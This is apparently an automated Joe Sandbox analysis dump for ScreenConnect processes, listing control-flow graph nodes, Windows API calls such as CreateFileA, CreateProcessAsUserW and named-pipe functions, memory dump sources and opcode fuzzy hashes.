                                                                  control_flow_graph 214 5ee2a27-5ee2a30 216 5ee29c4-5ee2a20 214->216 217 5ee2a32-5ee3434 214->217 224 5ee3488-5ee350b CreateFileA 217->224 225 5ee3436-5ee345b 217->225 232 5ee350d-5ee3513 224->232 233 5ee3514-5ee3552 224->233 225->224 228 5ee345d-5ee345f 225->228 230 5ee3482-5ee3485 228->230 231 5ee3461-5ee346b 228->231 230->224 234 5ee346f-5ee347e 231->234 235 5ee346d 231->235 232->233 240 5ee3554-5ee3558 233->240 241 5ee3562-5ee9567 233->241 234->234 236 5ee3480 234->236 235->234 236->230 240->241 242 5ee355a 240->242 242->241
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05EE34F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 2f6977b35df4e09815aeae9bba122d76295c37f7bd534b7d658e1cb5caf3175b
                                                                  • Instruction ID: 0af1371c6417cbd7ac806b678f2c5416547210104aa544c5511e20ae82242369
                                                                  • Opcode Fuzzy Hash: 2f6977b35df4e09815aeae9bba122d76295c37f7bd534b7d658e1cb5caf3175b
                                                                  • Instruction Fuzzy Hash: ED51ABB2D142698FDB00CFA9C88179DBFF1EB48304F14856AE484EB292D7789805CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 245 5ee33cd-5ee33d4 246 5ee336a-5ee33a3 245->246 247 5ee33d6-5ee3434 245->247 254 5ee33ac 246->254 255 5ee33a5-5ee33aa 246->255 249 5ee3488-5ee350b CreateFileA 247->249 250 5ee3436-5ee345b 247->250 261 5ee350d-5ee3513 249->261 262 5ee3514-5ee3552 249->262 250->249 256 5ee345d-5ee345f 250->256 257 5ee33b1-5ee33bb call 5ee2a74 254->257 255->257 259 5ee3482-5ee3485 256->259 260 5ee3461-5ee346b 256->260 266 5ee33c0-5ee33c2 257->266 259->249 264 5ee346f-5ee347e 260->264 265 5ee346d 260->265 261->262 271 5ee3554-5ee3558 262->271 272 5ee3562-5ee9567 262->272 264->264 267 5ee3480 264->267 265->264 267->259 271->272 273 5ee355a 271->273 273->272
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05EE34F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 99582ddfb5087e09afed625dc874009ac37d1bb12b99533816d44a5a1de6d887
                                                                  • Instruction ID: 191b49e59dd478e89f0ad3041d11d49b8b37c918286e39356fb89271fe480b24
                                                                  • Opcode Fuzzy Hash: 99582ddfb5087e09afed625dc874009ac37d1bb12b99533816d44a5a1de6d887
                                                                  • Instruction Fuzzy Hash: C151CCB1D103099FDB10CFA9C841BDEBFF2BF48304F24842AE848AB291D774A845CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 276 5ee2a74-5ee3434 278 5ee3488-5ee350b CreateFileA 276->278 279 5ee3436-5ee345b 276->279 286 5ee350d-5ee3513 278->286 287 5ee3514-5ee3552 278->287 279->278 282 5ee345d-5ee345f 279->282 284 5ee3482-5ee3485 282->284 285 5ee3461-5ee346b 282->285 284->278 288 5ee346f-5ee347e 285->288 289 5ee346d 285->289 286->287 294 5ee3554-5ee3558 287->294 295 5ee3562-5ee9567 287->295 288->288 290 5ee3480 288->290 289->288 290->284 294->295 296 5ee355a 294->296 296->295
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05EE34F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 023e860ff34d6012bea6ddc1edd6765c219e8c1e751068c98761b0b999238c23
                                                                  • Instruction ID: 8854171967b96234731013c9b22aace0f46290ef266a850587fc13b3b9eca366
                                                                  • Opcode Fuzzy Hash: 023e860ff34d6012bea6ddc1edd6765c219e8c1e751068c98761b0b999238c23
                                                                  • Instruction Fuzzy Hash: 5A5167B1D102499FDB10CFA9C844B9EBBF2FB48304F248529E849AB351D7B5A845CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 299 5ef28ab-5ef2901 301 5ef290c-5ef2910 299->301 302 5ef2903-5ef2909 299->302 303 5ef2918-5ef292d 301->303 304 5ef2912-5ef2915 301->304 302->301 305 5ef292f-5ef2938 303->305 306 5ef293b-5ef2992 CreateProcessAsUserW 303->306 304->303 305->306 307 5ef299b-5ef29c3 306->307 308 5ef2994-5ef299a 306->308 308->307
                                                                  APIs
                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF297F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: 6815e805395724dac422cccc822b3de11024e547c861c3406f68ef6a35dd13e0
                                                                  • Instruction ID: f2bd1b9c861c0e5d7e7b940de1ab979406968be6bf8ea35718cc7f1896ec4c83
                                                                  • Opcode Fuzzy Hash: 6815e805395724dac422cccc822b3de11024e547c861c3406f68ef6a35dd13e0
                                                                  • Instruction Fuzzy Hash: 7D41247690020ADFDF10CFA9C880ADEBBF5FF48314F14852AEA58A7250D775A955CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 322 5ee6531-5ee65d1 ProcessIdToSessionId 323 5ee65da-5ee6602 322->323 324 5ee65d3-5ee65d9 322->324 324->323
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05EE65BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 8de9b7eb738d57028aa5b41a08f9e83ba8fe0d4270e3e516928997a501635830
                                                                  • Instruction ID: bc06e0f245223143999778410fe0a629dcb3418e152becbfebb897992491489a
                                                                  • Opcode Fuzzy Hash: 8de9b7eb738d57028aa5b41a08f9e83ba8fe0d4270e3e516928997a501635830
                                                                  • Instruction Fuzzy Hash: 7E2184B58043499FDB00CFA9D841BDEBFF4EF48224F14849AE498A7241D338A649CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 327 5ef1454-5ef14ee ConnectNamedPipe 329 5ef14f7-5ef1539 327->329 330 5ef14f0-5ef14f6 327->330 334 5ef153b 329->334 335 5ef1543 329->335 330->329 334->335 336 5ef1544 335->336 336->336
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 05EF14D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 69ac0980a86ebff4d0b6458f5e2619b10f373af4a2a8a441e85a477959a26b86
                                                                  • Instruction ID: 4dc644154ac847d0baa1c1bca5933dbe9b81fbc0950f9d1ff9fb7444a86f9fb9
                                                                  • Opcode Fuzzy Hash: 69ac0980a86ebff4d0b6458f5e2619b10f373af4a2a8a441e85a477959a26b86
                                                                  • Instruction Fuzzy Hash: 6E2125B1D04259DFDB24CF99D494BDEBBF1AF48210F14806AE949A7350DB74A845CFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 345 5ef1460-5ef14ee ConnectNamedPipe 347 5ef14f7-5ef1539 345->347 348 5ef14f0-5ef14f6 345->348 352 5ef153b 347->352 353 5ef1543 347->353 348->347 352->353 354 5ef1544 353->354 354->354
                                                                  APIs
                                                                  • ConnectNamedPipe.KERNEL32(00000000), ref: 05EF14D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 7d629b9c813b467a0ace34378c9425fcd3fc03826874a4b013fe424a2967151e
                                                                  • Instruction ID: f421a13ee400407b39aa90b8b366d689299f2ca9b8d63569e91b064a9d9eb4cf
                                                                  • Opcode Fuzzy Hash: 7d629b9c813b467a0ace34378c9425fcd3fc03826874a4b013fe424a2967151e
                                                                  • Instruction Fuzzy Hash: 392135B1D04258DFDB24CF9AD484BDEBBF5AF48300F10806AE949A7340DB74A804CFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 337 5ee4c04-5ee64ae 339 5ee64ba-5ee64f0 K32EnumProcesses 337->339 340 5ee64b0-5ee64b8 337->340 341 5ee64f9-5ee6521 339->341 342 5ee64f2-5ee64f8 339->342 340->339 342->341
                                                                  APIs
                                                                  • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05EE64DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: EnumProcesses
                                                                  • String ID:
                                                                  • API String ID: 84517404-0
                                                                  • Opcode ID: 92c74d2f3f4002087077ddb8bcab3a9033d18b6e1d9654026435e0b71ce64631
                                                                  • Instruction ID: 1ad52118892b04b8ec5c8479c921447b2f1e82e352f58f2afb39e633e05d3129
                                                                  • Opcode Fuzzy Hash: 92c74d2f3f4002087077ddb8bcab3a9033d18b6e1d9654026435e0b71ce64631
                                                                  • Instruction Fuzzy Hash: 432128B29042099FDB10CF9AD885BDEFBF5FB48324F10846EE519A7300D778A941CBA5
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF61C6), ref: 05EF626F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: 736fe7419ebfcbb32463b6d38beed86c03d90cc7ab0e91c6450b74aee428e878
                                                                  • Instruction ID: d50502571fa08161e859903c36f996e68d6fbf4420d6c34f5e6fda8264d9fdea
                                                                  • Opcode Fuzzy Hash: 736fe7419ebfcbb32463b6d38beed86c03d90cc7ab0e91c6450b74aee428e878
                                                                  • Instruction Fuzzy Hash: 6D2115B68043098FDB10CF9AC444BEEBBF4FB88324F14942ED559A7240DB79A945CFA1
                                                                  APIs
                                                                  • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF61C6), ref: 05EF626F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipeWait
                                                                  • String ID:
                                                                  • API String ID: 3146367894-0
                                                                  • Opcode ID: 4c6c43b152a6c60075eff9aadabc8cc9828555efbcae34fd119b42361b7f07fe
                                                                  • Instruction ID: e75e23f01d80a05d635250c153474678c6a9fe5779faedeeece08b0b35ac5791
                                                                  • Opcode Fuzzy Hash: 4c6c43b152a6c60075eff9aadabc8cc9828555efbcae34fd119b42361b7f07fe
                                                                  • Instruction Fuzzy Hash: 7F2124B6800209DFDB10CF9AC844BEEBBF4FB88324F14942ED959A7240C779A545CFA1
                                                                  APIs
                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05EE65BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessSession
                                                                  • String ID:
                                                                  • API String ID: 3779259828-0
                                                                  • Opcode ID: 9899a800afe1bd9e6f90af6724ab08b44dac562848845adc078f00ab1baeef0e
                                                                  • Instruction ID: 8e450af91a14fc4fa495fd4049c4e6dc1f89fb5b83ee184de4453c888f10d340
                                                                  • Opcode Fuzzy Hash: 9899a800afe1bd9e6f90af6724ab08b44dac562848845adc078f00ab1baeef0e
                                                                  • Instruction Fuzzy Hash: 321133B18003098FDB10CF9AD5447EEBBF4FB48324F10842AD458A7240D778A545CFA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3436922138.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_149d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a90d204e1e40378a2ebdffb6ffdcb7119f12c55f11c67189e7e1b5e91e6dc740
                                                                  • Instruction ID: 57ee747c1b1467c219ac48c9cd09fdca8178fcffbe72e9befaafd8016df7d80e
                                                                  • Opcode Fuzzy Hash: a90d204e1e40378a2ebdffb6ffdcb7119f12c55f11c67189e7e1b5e91e6dc740
                                                                  • Instruction Fuzzy Hash: FA212876904280DFDF05DF94D9C0B2BBF65FB88310F2081AED90D0B266C376D856CAA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3436922138.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_149d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                  • Instruction ID: 9efb23a494d3dafe04d9591f544c4d63effdf96b3476aa77bfe43e2eb2df7a29
                                                                  • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                  • Instruction Fuzzy Hash: 8F11A276904280CFCF16CF54D5C4B1ABF62FB88314F2485AAD9090B267C336D456CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3436922138.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_149d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3588509654434ad1767c01fc4746efb4ce85eae15bf4dfed40ece8f7089a001b
                                                                  • Instruction ID: d7855a3ba86ac4d40417889280065af7484a008e497f33f4c7c7d414b4755f17
                                                                  • Opcode Fuzzy Hash: 3588509654434ad1767c01fc4746efb4ce85eae15bf4dfed40ece8f7089a001b
                                                                  • Instruction Fuzzy Hash: 7D01007240E3C49FE7128B258994752BFB4EF43264F1981DBD9888F2A3C6795845CB72
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3436922138.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_149d000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 553b172e424fe269d0d2b49024c354f43ec1bcf445c0286f12791b2232e1b38d
                                                                  • Instruction ID: f6c006ae00b65f1ad87022b2615f22b98c78706870440165412eeebefe659a6a
                                                                  • Opcode Fuzzy Hash: 553b172e424fe269d0d2b49024c354f43ec1bcf445c0286f12791b2232e1b38d
                                                                  • Instruction Fuzzy Hash: B801ACB18043449AEB104E59CD84757BF98EF413A8F18C51BDE495B263C6799441C6B1
                                                                  APIs
                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 014F4DBE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3437571677.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_14f0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: bf9d712486ae027c87a2888912a4a58b8537642c7c2f8da3974619f9ecc3a8eb
                                                                  • Instruction ID: 45c83d33af69950dcee881579d7b653bdd4207bd1f9ce7c53f5416f25de26092
                                                                  • Opcode Fuzzy Hash: bf9d712486ae027c87a2888912a4a58b8537642c7c2f8da3974619f9ecc3a8eb
                                                                  • Instruction Fuzzy Hash: 97212771900328EFEF60DF19C804B9AFBB5FB44210F1081DAD50867250CBB56A94CF92

                                                                  Execution Graph

                                                                  Execution Coverage:11.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:27.3%
                                                                  Total number of Nodes:11
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 22813 7ffd340d5b35 22814 7ffd340d5b4f CreateNamedPipeW 22813->22814 22816 7ffd340d5ca3 22814->22816 22809 7ffd340d5ce1 22810 7ffd340d5cef ConnectNamedPipe 22809->22810 22812 7ffd340d5dc2 22810->22812 22804 7ffd340b7fc4 22805 7ffd340b7fcd 22804->22805 22806 7ffd340b8032 22805->22806 22807 7ffd340b80a6 SetProcessMitigationPolicy 22805->22807 22808 7ffd340b8102 22807->22808

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 190 7ffd343c6ed3-7ffd343c6f4c 195 7ffd343c6f96-7ffd343c6fa6 190->195 196 7ffd343c6f4e-7ffd343c6f6a 190->196 204 7ffd343c6fa8-7ffd343c6faa 195->204 205 7ffd343c6fac-7ffd343c6fba call 7ffd343c0e20 195->205 197 7ffd343c6f70-7ffd343c6f8e call 7ffd343c0c30 * 2 196->197 198 7ffd343c72ef-7ffd343c730d call 7ffd343c0c30 * 2 196->198 213 7ffd343c7185-7ffd343c71a3 call 7ffd343c0c30 * 2 197->213 214 7ffd343c6f94-7ffd343c6f95 197->214 215 7ffd343c7419-7ffd343c7424 198->215 216 7ffd343c7313-7ffd343c731a 198->216 208 7ffd343c6fbd-7ffd343c6fd2 204->208 205->208 218 7ffd343c6fd8-7ffd343c6fe6 call 7ffd343c0e20 208->218 219 7ffd343c6fd4-7ffd343c6fd6 208->219 237 7ffd343c71a5-7ffd343c71af 213->237 238 7ffd343c71cd-7ffd343c71eb call 7ffd343c0c30 * 2 213->238 214->195 221 7ffd343c731c-7ffd343c732b 216->221 222 7ffd343c732d-7ffd343c732f 216->222 223 7ffd343c6fe9-7ffd343c6ff7 218->223 219->223 221->222 230 7ffd343c7331 221->230 224 7ffd343c7336-7ffd343c7350 222->224 235 7ffd343c6ff9-7ffd343c6ffb 223->235 236 7ffd343c6ffd-7ffd343c700b call 7ffd343c0e20 223->236 234 7ffd343c7353-7ffd343c735a 224->234 230->224 240 7ffd343c73a6-7ffd343c73b4 234->240 241 7ffd343c735c-7ffd343c7379 234->241 242 7ffd343c700e-7ffd343c7028 235->242 236->242 244 7ffd343c71c3 237->244 245 7ffd343c71b1-7ffd343c71c1 237->245 258 7ffd343c72a2-7ffd343c72ad 238->258 259 7ffd343c71f1-7ffd343c71fc 238->259 240->215 240->234 252 7ffd343c7425-7ffd343c7497 241->252 253 7ffd343c737f-7ffd343c73a4 241->253 264 7ffd343c702f-7ffd343c7036 242->264 249 7ffd343c71c5-7ffd343c71c6 244->249 245->249 249->238 269 7ffd343c7499-7ffd343c74de 252->269 270 7ffd343c74e0-7ffd343c7536 252->270 253->240 273 7ffd343c72af-7ffd343c72b1 258->273 274 7ffd343c72b3-7ffd343c72c2 call 7ffd343c0e20 258->274 271 7ffd343c71fe-7ffd343c7200 259->271 272 7ffd343c7202-7ffd343c7211 call 7ffd343c0e20 259->272 264->213 268 7ffd343c703c-7ffd343c7043 264->268 268->213 276 7ffd343c7049-7ffd343c7060 268->276 269->270 296 7ffd343c7538-7ffd343c7539 270->296 297 7ffd343c753c-7ffd343c7560 270->297 277 7ffd343c7214-7ffd343c7248 271->277 272->277 279 7ffd343c72c5-7ffd343c72c7 273->279 274->279 293 7ffd343c7095-7ffd343c70a0 276->293 294 7ffd343c7062-7ffd343c7074 276->294 277->258 290 7ffd343c724a-7ffd343c724f 277->290 279->215 282 7ffd343c72cd-7ffd343c72ee 279->282 295 7ffd343c7252-7ffd343c7258 290->295 311 7ffd343c70a6-7ffd343c70b5 call 7ffd343c0e20 293->311 312 7ffd343c70a2-7ffd343c70a4 293->312 313 7ffd343c7076-7ffd343c7078 294->313 314 7ffd343c707a-7ffd343c7088 call 7ffd343c0e20 294->314 299 7ffd343c726b-7ffd343c7273 295->299 300 7ffd343c725a-7ffd343c7262 295->300 296->297 316 7ffd343c7592-7ffd343c759b 297->316 317 7ffd343c7562-7ffd343c7571 297->317 301 7ffd343c7274-7ffd343c7275 299->301 305 7ffd343c7285-7ffd343c72a0 299->305 300->301 302 7ffd343c7264-7ffd343c7269 300->302 309 7ffd343c727a-7ffd343c7284 call 7ffd343c6ba0 301->309 302->309 305->258 305->295 309->305 318 7ffd343c70b8-7ffd343c70ba 311->318 312->318 322 7ffd343c708b-7ffd343c708e 313->322 314->322 325 7ffd343c7577-7ffd343c7591 317->325 326 7ffd343c7573-7ffd343c7574 317->326 329 7ffd343c70c0-7ffd343c70d7 318->329 330 7ffd343c716f-7ffd343c7181 318->330 322->293 326->325 329->330 337 7ffd343c70dd-7ffd343c70fa 329->337 330->213 341 7ffd343c7106 337->341 342 7ffd343c70fc-7ffd343c7104 337->342 343 7ffd343c7108-7ffd343c710a 341->343 342->343 343->330 345 7ffd343c710c-7ffd343c7116 343->345 346 7ffd343c7118-7ffd343c7122 call 7ffd343c1868 345->346 347 7ffd343c7124-7ffd343c712c 345->347 346->213 346->347 349 7ffd343c715a-7ffd343c716d call 7ffd343c5630 347->349 350 7ffd343c712e-7ffd343c7153 call 7ffd343c5498 347->350 349->213 350->349
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Xa;4$Xc;4$`Y4$Y4
                                                                  • API String ID: 0-1213361075
                                                                  • Opcode ID: 26995c4b4e65b8c09bea894a6d3e5050c5a5e224962788f34c935fb59271e925
                                                                  • Instruction ID: 144c929889ab7ba05a5afb229a7b5b10436e57ec77b4e9db70e75867e25888fe
                                                                  • Opcode Fuzzy Hash: 26995c4b4e65b8c09bea894a6d3e5050c5a5e224962788f34c935fb59271e925
                                                                  • Instruction Fuzzy Hash: 8212D171B5CA474BEB99AB6885B16B973D2EF8A304F54407AD94DC72D2DE3CBC01A340

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340BA000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340ba000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ;M_^$?M_I$@M_I
                                                                  • API String ID: 0-3062565566
                                                                  • Opcode ID: e1dfd44eb9fe588c5ff027ff805d933c74d2b006b50ef5c9a3ac677855cf4810
                                                                  • Instruction ID: 7b4b493f67701918685de83e9a2228cdc2862c3ed158321d432f3c8b5b67ab6c
                                                                  • Opcode Fuzzy Hash: e1dfd44eb9fe588c5ff027ff805d933c74d2b006b50ef5c9a3ac677855cf4810
                                                                  • Instruction Fuzzy Hash: 6CB11753B0EAC68BE755969C5AE40BA7B90EF9322431843FBD588DE0D7DC19EC07A341
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 01%4$X4
                                                                  • API String ID: 0-1525137719
                                                                  • Opcode ID: 8834e1fac31c976e1a770a939a3c0a453e34c9a6595d831649a94ea23d6af9f6
                                                                  • Instruction ID: f9b012a8046aebe58b182e768c784fe00759a1d614c08b33eb2c5f76edcaf42f
                                                                  • Opcode Fuzzy Hash: 8834e1fac31c976e1a770a939a3c0a453e34c9a6595d831649a94ea23d6af9f6
                                                                  • Instruction Fuzzy Hash: 6C121571B5CA9A4FE799EAAC84A16F537E1EF5A304F0440BAD58DC7283DD2CEC059740
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8*74$8*74
                                                                  • API String ID: 0-1825446048
                                                                  • Opcode ID: 3acebb98cee73953cbcce570057245115adf637bcd29c6caef8c0a9f03bd87d1
                                                                  • Instruction ID: 5378f5981c483be806722eac484b4ef66eb19455997c1b32d40f1dbf6db163d3
                                                                  • Opcode Fuzzy Hash: 3acebb98cee73953cbcce570057245115adf637bcd29c6caef8c0a9f03bd87d1
                                                                  • Instruction Fuzzy Hash: 1202B171B5CA4A4FEB98FB2884A56B973D1FFA9300F50447ED54EC72A2DE38AC418741
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3466013811.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd343c0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PW;4
                                                                  • API String ID: 0-2663183110
                                                                  • Opcode ID: e1fbab0b63448772f4c1058b0675ba215866207f7166fac17fe34b5e049f1d62
                                                                  • Instruction ID: 15f86fa57c8e07467e4f9a909cae04457b5de7914a2cd7e5d5e5e283e3de72e7
                                                                  • Opcode Fuzzy Hash: e1fbab0b63448772f4c1058b0675ba215866207f7166fac17fe34b5e049f1d62
                                                                  • Instruction Fuzzy Hash: A3023722B8CA5A4BEBA5BA2855B52F933D1EF46314F48017AD54DC71E3DE3CBC069280
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3457880698.00007FFD340D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340D3000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd340d3000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2489174969-0
